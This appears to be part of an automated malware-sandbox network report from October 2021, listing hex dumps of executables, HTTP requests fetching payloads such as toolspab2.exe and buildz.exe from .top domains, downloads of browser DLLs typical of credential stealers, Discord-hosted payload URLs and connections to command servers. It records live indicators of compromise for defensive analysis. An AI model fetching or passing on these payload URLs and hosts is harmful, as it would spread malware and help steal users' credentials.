00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 12:10:58 GMTServer: Apache/2.4.6 (CentOS) PHP/5.6.40Last-Modified: Fri, 29 Oct 2021 12:10:02 GMTETag: "d6200-5cf7cb4ef9326"Accept-Ranges: bytesContent-Length: 877056Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b5 ed f7 3e f1 8c 99 6d f1 8c 99 6d f1 8c 99 6d 9e fa 32 6d dd 8c 99 6d 9e fa 07 6d d3 8c 99 6d 9e fa 33 6d 71 8c 99 6d f8 f4 0a 6d f8 8c 99 6d f1 8c 98 6d 8f 8c 99 6d 9e fa 36 6d f0 8c 99 6d 9e fa 03 6d f0 8c 99 6d 9e fa 04 6d f0 8c 99 6d 52 69 63 68 f1 8c 99 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ed ff a0 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 e4 0b 00 00 c0 70 02 00 00 00 00 20 e3 09 00 00 10 00 00 00 00 0c 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 7c 02 00 04 00 00 6a 61 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 e7 0b 00 64 00 00 00 00 80 7b 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 7b 02 94 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 d7 09 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 e3 0b 00 00 10 00 00 00 e4 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 69 6f 02 00 00 0c 00 00 16 00 00 00 e8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 
75 63 69 00 00 00 e5 02 00 00 00 70 7b 02 00 04 00 00 00 fe 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 3c 00 00 00 80 7b 02 00 3c 00 00 00 02 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 01 00 00 c0 7b 02 00 24 01 00 00 3e 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 12:11:18 GMTContent-Type: application/x-msdos-programContent-Length: 334288Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "519d0-57aa1f0b0df80"Expires: Sat, 30 Oct 2021 12:11:18 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 12:11:18 GMTContent-Type: application/x-msdos-programContent-Length: 137168Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "217d0-57aa1f0b0df80"Expires: Sat, 30 Oct 2021 12:11:18 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 12:11:18 GMTContent-Type: application/x-msdos-programContent-Length: 440120Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "6b738-57aa1f0b0df80"Expires: Sat, 30 Oct 2021 12:11:18 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 12:11:19 GMTContent-Type: application/x-msdos-programContent-Length: 1246160Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "1303d0-57aa1f0b0df80"Expires: Sat, 30 Oct 2021 12:11:19 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 12:11:19 GMTContent-Type: application/x-msdos-programContent-Length: 144848Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "235d0-57aa1f0b0df80"Expires: Sat, 30 Oct 2021 12:11:19 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 12:11:19 GMTContent-Type: application/x-msdos-programContent-Length: 83784Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "14748-57aa1f0b0df80"Expires: Sat, 30 Oct 2021 12:11:19 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytes
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49826 version: TLS 1.0
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.3:49978 -> 93.115.20.139:28978
Source: global traffic TCP traffic: 192.168.2.3:50095 -> 213.142.148.231:58682
Source: global traffic TCP traffic: 192.168.2.3:50109 -> 185.215.113.94:15564
Source: global traffic TCP traffic: 192.168.2.3:50115 -> 2.56.214.190:59628
Source: D8D0.exe.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: CD17.exe.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: D8D0.exe.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: CD17.exe.10.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: CD17.exe.10.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: D8D0.exe.10.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: CD17.exe.10.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: D8D0.exe.10.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: D8D0.exe.10.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: CD17.exe.10.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: D8D0.exe.10.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: CD17.exe.10.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: B096.exe, B096.exe.10.dr String found in binary or memory: http://fontello.com
Source: D8D0.exe.10.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: CD17.exe.10.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: D8D0.exe.10.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: CD17.exe.10.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: B096.exe, 00000018.00000002.502019916.0000000002DA1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: DF3A.exe.10.dr String found in binary or memory: http://tempuri.org/DetailsDataSet1.xsd
Source: D8D0.exe.10.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: sqlite3.dll.35.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr String found in binary or memory: https://accounts.google.com
Source: craw_window.js.34.dr String found in binary or memory: https://accounts.google.com/MergeSession
Source: B096.exe, 00000018.00000002.503371064.0000000003E09000.00000004.00000001.sdmp, aspnet_state.exe, 0000001E.00000000.439226875.0000000000402000.00000040.00000001.sdmp, DF3A.exe, 00000027.00000000.489693993.0000000000402000.00000040.00000001.sdmp, ServiceModelReg.exe, 00000028.00000000.483819247.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr String found in binary or memory: https://apis.google.com
Source: B096.exe, 00000018.00000002.502019916.0000000002DA1000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com
Source: B096.exe String found in binary or memory: https://cdn.discordapp.com/attachments/8
Source: DF3A.exe.10.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526114763767818/A623D0D3.jpg
Source: DF3A.exe.10.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526117016109056/AB0F9338.jpg
Source: D8D0.exe.10.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903196811345395712/6058E8D5.jpg
Source: BBE1.exe, 0000001B.00000000.422812164.0000000000792000.00000002.00020000.sdmp, BBE1.exe.10.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903333369742491648/1E88D378.jpg
Source: B096.exe, 00000018.00000002.502019916.0000000002DA1000.00000004.00000001.sdmp, B096.exe.10.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903575517888925756/6D9E3C88.jpg
Source: B096.exe, 00000018.00000002.502019916.0000000002DA1000.00000004.00000001.sdmp, B096.exe.10.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903575519373697084/F83CB811.jpg
Source: FD36.exe.10.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903579324031074365/ECF88C37.jpg
Source: DEDC.exe.10.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903580013041967104/06ED9A1B.jpg
Source: DEDC.exe.10.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903580015046828032/039F9A54.jpg
Source: DEDC.exe.10.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903580017093660692/A303D181.jpg
Source: DEDC.exe.10.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903580019203387432/930B55FC.jpg
Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr String found in binary or memory: https://clients2.google.com
Source: manifest.json.34.dr String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr String found in binary or memory: https://clients2.googleusercontent.com
Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr String found in binary or memory: https://content-autofill.googleapis.com
Source: Reporting and NEL.36.dr String found in binary or memory: https://csp.withgoogle.com/csp/report-to/IdentityListAccountsHttp/external
Source: f3f072f8-9740-417a-a88b-dfe93adcb8b1.tmp.36.dr, f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr String found in binary or memory: https://dns.google
Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr String found in binary or memory: https://fonts.googleapis.com
Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr String found in binary or memory: https://fonts.gstatic.com
Source: craw_window.js.34.dr, craw_background.js.34.dr String found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
Source: Network Action Predictor.34.dr String found in binary or memory: https://js.monitor.azure.com/
Source: Reporting and NEL.36.dr String found in binary or memory: https://mdec.nelreports.net/api/report?cat=mdocs
Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr String found in binary or memory: https://ogs.google.com
Source: craw_window.js.34.dr, manifest.json.34.dr String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr String found in binary or memory: https://play.google.com
Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr String found in binary or memory: https://r4---sn-4g5e6nss.gvt1.com
Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr String found in binary or memory: https://redirector.gvt1.com
Source: craw_window.js.34.dr, manifest.json.34.dr String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: CD17.exe.10.dr String found in binary or memory: https://sectigo.com/CPS0D
Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr String found in binary or memory: https://ssl.gstatic.com
Source: craw_window.js.34.dr, craw_background.js.34.dr String found in binary or memory: https://www-googleapis-staging.sandbox.google.com
Source: D8D0.exe.10.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr String found in binary or memory: https://www.google.com
Source: manifest.json.34.dr String found in binary or memory: https://www.google.com/
Source: craw_window.js.34.dr String found in binary or memory: https://www.google.com/accounts/OAuthLogin?issueuberauth=1
Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: craw_window.js.34.dr String found in binary or memory: https://www.google.com/images/cleardot.gif
Source: craw_window.js.34.dr String found in binary or memory: https://www.google.com/images/dot2.gif
Source: craw_window.js.34.dr String found in binary or memory: https://www.google.com/images/x2.gif
Source: craw_background.js.34.dr String found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, craw_window.js.34.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr, craw_background.js.34.dr String found in binary or memory: https://www.googleapis.com
Source: manifest.json.34.dr String found in binary or memory: https://www.googleapis.com/
Source: manifest.json.34.dr String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: manifest.json.34.dr String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: manifest.json.34.dr String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: manifest.json.34.dr String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr String found in binary or memory: https://www.gstatic.com
Source: unknown DNS traffic detected: queries for: xacokuo8.top
Source: global traffic HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-6000.top
Source: global traffic HTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sysaheu90.top
Source: global traffic HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: toptelete.top
Source: global traffic HTTP traffic detected: GET //l/f/SZ0UyXwB3dP17Spzhll9/cb2d375dd6e8a66a5a24666f2ccf0d937c972efe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.181
Source: global traffic HTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: znpst.top
Source: global traffic HTTP traffic detected: GET //l/f/SZ0UyXwB3dP17Spzhll9/44498d94a24300ea08dae81ac5b8f477f8279a65 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.181
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:09:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:09:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:09:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:09:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 